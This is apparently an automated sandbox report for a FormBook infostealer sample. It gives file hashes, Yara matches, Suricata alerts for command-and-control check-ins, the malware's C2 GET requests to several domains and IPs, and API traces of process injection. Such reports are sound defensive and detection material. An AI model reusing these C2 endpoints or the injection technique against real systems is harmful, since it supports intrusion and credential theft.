Summary | ZeroBOX

macroniska2.1.exe

NSIS UPX Malicious Library PE32 PE File
Category Machine Started Completed
FILE s1_win7_x6403_us Nov. 8, 2023, 5:30 p.m. Nov. 8, 2023, 5:34 p.m.
Size 557.4KB
Type PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
MD5 c84fe8d8b80e63f94c93ba326e65b5db
SHA256 fc72fd04104301dff8f041b736fbfda0b353d9d334d8bc57d70e9f2d9b3eb21f
CRC32 5DE7A193
ssdeep 12288:qx9s1E+WqM/9zMbuPa56PcmceHMu1B19bXrqX:qx9s1E4M/BPaE1cpubLqX
Yara
  • Malicious_Library_Zero - Malicious_Library
  • UPX_Zero - UPX packed file
  • PE_Header_Zero - PE File Signature
  • NSIS_Installer - Null Soft Installer
  • IsPE32 - (no description)

IP Address Status Action
104.21.47.35 Active Moloch
154.12.93.8 Active Moloch
164.124.101.2 Active Moloch
23.231.50.47 Active Moloch

Suricata Alerts

Flow SID Signature Category
UDP 192.168.56.103:64894 -> 164.124.101.2:53 2026888 ET INFO DNS Query for Suspicious .icu Domain Potentially Bad Traffic
TCP 192.168.56.103:49166 -> 104.21.47.35:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49167 -> 154.12.93.8:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49168 -> 23.231.50.47:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
section .ndata
suspicious_features GET method with no useragent header suspicious_request GET http://www.districonsumohome.com/tb8i/?hBZLW8l=uPlnLoSq3YhnKr6XkI/ibKBZR5UbIYDon83yscU5401mNJ1eOsSEnnQZdNPUCUqLRQJWzWjQ&jL3Tir=_PG0kH6pr8nlATBp
suspicious_features GET method with no useragent header suspicious_request GET http://www.gdtanhua.icu/tb8i/?hBZLW8l=5AAXAdZlmcRrCDR+Yfx/EblZaZMinPv2SiPC8X54i0y8Yz2HVSjKC3lJUrpNHrztM6AvkM+R&jL3Tir=_PG0kH6pr8nlATBp
suspicious_features GET method with no useragent header suspicious_request GET http://www.ecuajet.net/tb8i/?hBZLW8l=K0i+LInbjQMeF01bJpA1pnYCvby0p5ea/1o04Epx1gQSdVWES3s1884re8hJdKUMMJ2T7E8o&jL3Tir=_PG0kH6pr8nlATBp
request GET http://www.districonsumohome.com/tb8i/?hBZLW8l=uPlnLoSq3YhnKr6XkI/ibKBZR5UbIYDon83yscU5401mNJ1eOsSEnnQZdNPUCUqLRQJWzWjQ&jL3Tir=_PG0kH6pr8nlATBp
request GET http://www.gdtanhua.icu/tb8i/?hBZLW8l=5AAXAdZlmcRrCDR+Yfx/EblZaZMinPv2SiPC8X54i0y8Yz2HVSjKC3lJUrpNHrztM6AvkM+R&jL3Tir=_PG0kH6pr8nlATBp
request GET http://www.ecuajet.net/tb8i/?hBZLW8l=K0i+LInbjQMeF01bJpA1pnYCvby0p5ea/1o04Epx1gQSdVWES3s1884re8hJdKUMMJ2T7E8o&jL3Tir=_PG0kH6pr8nlATBp
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2060
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x003c0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2060
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x003e0000
allocation_type: 12289 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2124
region_size: 3158016
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00c20000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\eafhznn.exe
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
Process injection Process 2060 called NtSetContextThread to modify thread in remote process 2124
Time & API Arguments Status Return Repeated

NtSetContextThread

registers.eip: 2005598660
registers.esp: 3275624
registers.edi: 0
registers.eax: 4321472
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x000000dc
process_identifier: 2124
1 0 0